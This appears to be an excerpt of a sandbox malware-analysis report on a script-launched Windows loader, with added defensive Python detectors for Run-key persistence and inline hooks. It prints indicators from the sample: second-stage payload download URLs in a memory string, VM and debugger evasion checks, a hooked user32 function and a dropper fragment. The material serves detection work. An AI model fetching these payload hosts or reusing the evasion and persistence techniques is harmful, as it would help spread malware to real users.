Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_0347D0D1 push ecx; ret 26_2_0347D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A163D7 push 00000019h; ret 26_2_02A163DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2C883 push 00000038h; retf 26_2_02A2C88F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2A842 push edx; retf 26_2_02A2A843
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A29FB6 push es; iretd 26_2_02A29FBD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 26_2_02A2D4B5 push eax; ret 26_2_02A2D508
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dll Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IB1XSLUHG4 Jump to behavior
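An HKCU Run value named IB1XSLUHG4, created by a svchost.exe that is itself running from SysWOW64 under explorer.exe, is the persistence step; the K-NBS4VB directory written under AppData\Roaming earlier in this report follows the same generated-name style. The report does not show the value's data. As an added example (not report content), the following scores such a registry write, in the shape of a Sysmon Event ID 13 record, on the writer, the value name and the target path; the events are constructed and the Run value's data is an assumption.

```python
import re

# Added example (not from the report): scoring a registry value write against the
# autostart-persistence pattern seen here (svchost.exe creating an HKCU Run value
# with a generated name). Event shape follows Sysmon Event ID 13; the events below
# are constructed, and the Run value's data is an assumption, since the report
# does not show it.

AUTORUN_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
SCRIPT_HINTS = ("wscript", "cscript", "powershell", "mshta", "rundll32", "regsvr32",
                ".vbs", ".js", ".hta", ".ps1", ".bat")
# Windows binaries that never act as an installer; a Run value written by one of
# them means foreign code is running inside it (svchost.exe and explorer.exe here).
NOT_INSTALLERS = {"svchost.exe", "explorer.exe", "dllhost.exe"}
# Generated names of the kind seen in this report: 8-12 upper-case letters and
# digits with both present. A heuristic; tune the length band on your own data.
GENERATED_NAME = re.compile(r"^(?=.*[A-Z])(?=.*\d)[A-Z0-9]{8,12}$")


def assess_autorun_write(ev):
    """ev: {"image": writing process, "key": registry key, "value": value name,
    "data": value data}. Returns the reasons the write looks like malware
    persistence; [] for a benign or non-autorun write."""
    key = ev["key"].lower()
    if not key.endswith(AUTORUN_SUFFIXES):
        return []
    writer = ev["image"].rsplit("\\", 1)[-1].lower()
    data = ev["data"].lower()
    reasons = []
    if writer in NOT_INSTALLERS:
        reasons.append(f"written by {writer}, which is not an installer")
    if GENERATED_NAME.match(ev["value"]):
        reasons.append("machine-generated value name")
    if any(p in data for p in USER_WRITABLE):
        reasons.append("target lives in a user-writable directory")
    if any(h in data for h in SCRIPT_HINTS):
        reasons.append("script or LOLBin autostart")
    return reasons


SAMPLE_WRITES = [
    # Modelled on this report's Run value; the data is an assumed path, not observed.
    {"image": r"C:\Windows\SysWOW64\svchost.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "IB1XSLUHG4",
     "data": r"C:\Users\user\AppData\Roaming\K-NBS4VB\example.exe"},
    # An ordinary installer registering a tray agent under Program Files
    {"image": r"C:\Program Files\Vendor\setup.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "VendorAgent",
     "data": r"C:\Program Files\Vendor\agent.exe --tray"},
    # Same writer, but not an autostart key
    {"image": r"C:\Windows\SysWOW64\svchost.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "value": "Hidden", "data": "1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_WRITES:
        print(ev["value"], assess_autorun_write(ev) or "ok")
```

Keep the writer check even if the other heuristics are noisy on your estate: a Run value written by svchost.exe or explorer.exe has no legitimate explanation, and it is the one signal here that does not depend on how the malware names things.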

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE4
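This entry is the direct observable of the overview's "modifies the prolog of user mode functions" signature: the first bytes of user32!PeekMessageA inside explorer.exe no longer match the loaded image, so every call into that export passes through the injected code first. Checking for this on a live host means comparing each export's prolog in memory against the same build of the DLL on disk and then reading the patch. As an added example (not report content), the following does that comparison over constructed byte strings and names the common trampoline shapes; the six leading bytes for PeekMessageA are the ones this report logged, everything else, including the disk-side prolog, is made up. Two caveats a practitioner needs: an EDR places hooks of its own, so allowlist its known set rather than alerting on every difference, and take the clean bytes from a fresh file mapping, not from an ntdll copy already loaded in the suspect process.

```python
import struct

# Added example (not from the report): detecting inline hooks by diffing each
# export's prolog in memory against the bytes on disk, then naming the trampoline
# shape. All byte strings here are constructed except where noted.


def classify_patch(mem):
    """Name the detour at the start of a patched function; generic wording otherwise."""
    if mem[:1] == b"\xE9" and len(mem) >= 5:                        # jmp rel32
        return "jmp rel32 -> %+d" % struct.unpack_from("<i", mem, 1)[0]
    if mem[:2] == b"\xFF\x25":                                       # jmp [rip+disp32] / jmp [abs]
        return "jmp indirect"
    if mem[:2] == b"\x48\xB8" and mem[10:12] == b"\xFF\xE0":         # mov rax, imm64 ; jmp rax
        return "mov rax, 0x%016X ; jmp rax" % struct.unpack_from("<Q", mem, 2)[0]
    if mem[:1] == b"\x68" and mem[5:6] == b"\xC3":                   # push imm32 ; ret
        return "push 0x%08X ; ret" % struct.unpack_from("<I", mem, 1)[0]
    return "modified prolog, no known trampoline shape"


def find_inline_hooks(functions, prolog_len=16, allowlist=frozenset()):
    """functions: {name: (disk_bytes, memory_bytes)}. Returns {name: description}
    for every export whose first prolog_len bytes differ. Allowlist the hooks your
    own EDR places so that only unexpected patches are reported."""
    hooks = {}
    for name, (disk, mem) in functions.items():
        n = min(prolog_len, len(disk), len(mem))
        if disk[:n] != mem[:n] and name not in allowlist:
            hooks[name] = classify_patch(mem)
    return hooks


# A typical x64 prolog, used as the constructed "on disk" bytes for every export
PROLOG = bytes.fromhex("48895c2408 4889742410 57 4156 4157 4883ec20")
SAMPLE = {
    # the six bytes the report logged for user32!PeekMessageA in explorer.exe,
    # followed by the constructed prolog tail; the disk side is constructed
    "user32!PeekMessageA": (PROLOG, bytes.fromhex("488bb8899ee4") + PROLOG[6:]),
    "user32!GetMessageA": (PROLOG, b"\xE9" + struct.pack("<i", 0x1000) + PROLOG[5:]),
    "ntdll!NtResumeThread": (PROLOG, b"\x48\xB8" + struct.pack("<Q", 0x7FF612345000) + b"\xFF\xE0" + PROLOG[12:]),
    "kernel32!Sleep": (PROLOG, PROLOG),                                              # untouched
    "ntdll!NtProtectVirtualMemory": (PROLOG, b"\xE9" + struct.pack("<i", -0x2000) + PROLOG[5:]),  # EDR's own hook
}
EDR_HOOKS = frozenset({"ntdll!NtProtectVirtualMemory"})

if __name__ == "__main__":
    for name, what in find_inline_hooks(SAMPLE, allowlist=EDR_HOOKS).items():
        print(f"{name}: {what}")
```

The PeekMessageA case is the instructive one: the logged bytes do not form any of the textbook detours, so a scanner that only looks for E9/FF 25 would miss it, which is why the check is a byte-for-byte diff first and a pattern match second. Resolve the jmp or mov rax target afterwards and ask which module, if any, owns that address; a target in unbacked executable memory is the injected payload.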
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://WWW.BULKWHATSAPPSENDER.IN/BIN_FLDFMMV154.BINHTTPS://MADECOSMETICS.STORE/BIN_FLDFMMV154.BIN
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002A19904 second address: 0000000002A1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002A19B7E second address: 0000000002A19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: Initial file Initial file: For i = 1 To len(h) step 2 if ChrW("&H" & mid(h,i,2)) = "ZZZ" then Wscript.Sleep(1)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3427
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 862
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 5.9 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC86A60 rdtscp 23_2_1EC86A60
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: powershell.exe, 00000004.00000003.527285571.0000000005E1C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000018.00000000.679067894.0000000008430000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: ieinstal.exe, 00000017.00000003.661574907.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728416518.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729596885.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661150851.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWRT
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000018.00000000.692920243.000000000640C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 00000017.00000003.661574907.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728416518.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729596885.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661150851.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: explorer.exe, 00000018.00000000.696204667.00000000083E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: wscript.exe, 00000001.00000003.360714915.0000020FF7DA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\A
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000018.00000000.678887998.00000000082E2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.bin
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000018.00000000.678887998.00000000082E2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: ieinstal.exe, 00000017.00000002.729829863.00000000049CA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: explorer.exe, 00000018.00000000.679067894.0000000008430000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: powershell.exe, 00000004.00000002.670508477.0000000005B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000018.00000000.756892182.000000000095C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC82ACB mov eax, dword ptr fs:[00000030h] 23_2_1EC82ACB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED28ED6 mov eax, dword ptr fs:[00000030h] 23_2_1ED28ED6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC836CC mov eax, dword ptr fs:[00000030h] 23_2_1EC836CC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC98EC7 mov eax, dword ptr fs:[00000030h] 23_2_1EC98EC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED0FEC0 mov eax, dword ptr fs:[00000030h] 23_2_1ED0FEC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC676E2 mov eax, dword ptr fs:[00000030h] 23_2_1EC676E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC816E0 mov ecx, dword ptr fs:[00000030h] 23_2_1EC816E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC82AE4 mov eax, dword ptr fs:[00000030h] 23_2_1EC82AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECEFE87 mov eax, dword ptr fs:[00000030h] 23_2_1ECEFE87
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC8D294 mov eax, dword ptr fs:[00000030h] 23_2_1EC8D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC552A5 mov eax, dword ptr fs:[00000030h] 23_2_1EC552A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECD46A7 mov eax, dword ptr fs:[00000030h] 23_2_1ECD46A7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC6AAB0 mov eax, dword ptr fs:[00000030h] 23_2_1EC6AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED20EA5 mov eax, dword ptr fs:[00000030h] 23_2_1ED20EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC8FAB0 mov eax, dword ptr fs:[00000030h] 23_2_1EC8FAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC59240 mov eax, dword ptr fs:[00000030h] 23_2_1EC59240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC67E41 mov eax, dword ptr fs:[00000030h] 23_2_1EC67E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECE4257 mov eax, dword ptr fs:[00000030h] 23_2_1ECE4257
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC6766D mov eax, dword ptr fs:[00000030h] 23_2_1EC6766D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED0B260 mov eax, dword ptr fs:[00000030h] 23_2_1ED0B260
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED28A62 mov eax, dword ptr fs:[00000030h] 23_2_1ED28A62
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC9927A mov eax, dword ptr fs:[00000030h] 23_2_1EC9927A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC7AE73 mov eax, dword ptr fs:[00000030h] 23_2_1EC7AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC5C600 mov eax, dword ptr fs:[00000030h] 23_2_1EC5C600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC88E00 mov eax, dword ptr fs:[00000030h] 23_2_1EC88E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC68A0A mov eax, dword ptr fs:[00000030h] 23_2_1EC68A0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC5AA16 mov eax, dword ptr fs:[00000030h] 23_2_1EC5AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC8A61C mov eax, dword ptr fs:[00000030h] 23_2_1EC8A61C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC55210 mov eax, dword ptr fs:[00000030h] 23_2_1EC55210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC55210 mov ecx, dword ptr fs:[00000030h] 23_2_1EC55210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED11608 mov eax, dword ptr fs:[00000030h] 23_2_1ED11608
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC73A1C mov eax, dword ptr fs:[00000030h] 23_2_1EC73A1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC5E620 mov eax, dword ptr fs:[00000030h] 23_2_1EC5E620
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC94A2C mov eax, dword ptr fs:[00000030h] 23_2_1EC94A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED0FE3F mov eax, dword ptr fs:[00000030h] 23_2_1ED0FE3F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECD53CA mov eax, dword ptr fs:[00000030h] 23_2_1ECD53CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h] 23_2_1EC803E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h] 23_2_1EC803E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h] 23_2_1EC803E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h] 23_2_1EC803E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h] 23_2_1EC803E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC803E2 mov eax, dword ptr fs:[00000030h] 23_2_1EC803E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC7DBE9 mov eax, dword ptr fs:[00000030h] 23_2_1EC7DBE9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC937F5 mov eax, dword ptr fs:[00000030h] 23_2_1EC937F5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC61B8F mov eax, dword ptr fs:[00000030h] 23_2_1EC61B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC61B8F mov eax, dword ptr fs:[00000030h] 23_2_1EC61B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED0D380 mov ecx, dword ptr fs:[00000030h] 23_2_1ED0D380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC68794 mov eax, dword ptr fs:[00000030h] 23_2_1EC68794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC8B390 mov eax, dword ptr fs:[00000030h] 23_2_1EC8B390
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECD7794 mov eax, dword ptr fs:[00000030h] 23_2_1ECD7794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECD7794 mov eax, dword ptr fs:[00000030h] 23_2_1ECD7794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECD7794 mov eax, dword ptr fs:[00000030h] 23_2_1ECD7794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED1138A mov eax, dword ptr fs:[00000030h] 23_2_1ED1138A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC82397 mov eax, dword ptr fs:[00000030h] 23_2_1EC82397
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC84BAD mov eax, dword ptr fs:[00000030h] 23_2_1EC84BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC84BAD mov eax, dword ptr fs:[00000030h] 23_2_1EC84BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC84BAD mov eax, dword ptr fs:[00000030h] 23_2_1EC84BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED25BA5 mov eax, dword ptr fs:[00000030h] 23_2_1ED25BA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC5DB40 mov eax, dword ptr fs:[00000030h] 23_2_1EC5DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC6EF40 mov eax, dword ptr fs:[00000030h] 23_2_1EC6EF40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED28B58 mov eax, dword ptr fs:[00000030h] 23_2_1ED28B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC5F358 mov eax, dword ptr fs:[00000030h] 23_2_1EC5F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC5DB60 mov ecx, dword ptr fs:[00000030h] 23_2_1EC5DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC6FF60 mov eax, dword ptr fs:[00000030h] 23_2_1EC6FF60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC83B7A mov eax, dword ptr fs:[00000030h] 23_2_1EC83B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC83B7A mov eax, dword ptr fs:[00000030h] 23_2_1EC83B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED28F6A mov eax, dword ptr fs:[00000030h] 23_2_1ED28F6A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC8A70E mov eax, dword ptr fs:[00000030h] 23_2_1EC8A70E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC8A70E mov eax, dword ptr fs:[00000030h] 23_2_1EC8A70E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ED1131B mov eax, dword ptr fs:[00000030h] 23_2_1ED1131B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1EC7F716 mov eax, dword ptr fs:[00000030h] 23_2_1EC7F716
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECEFF10 mov eax, dword ptr fs:[00000030h] 23_2_1ECEFF10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 23_2_1ECEFF10 mov eax, dword ptr fs:[00000030h] 23_2_1ECEFF10
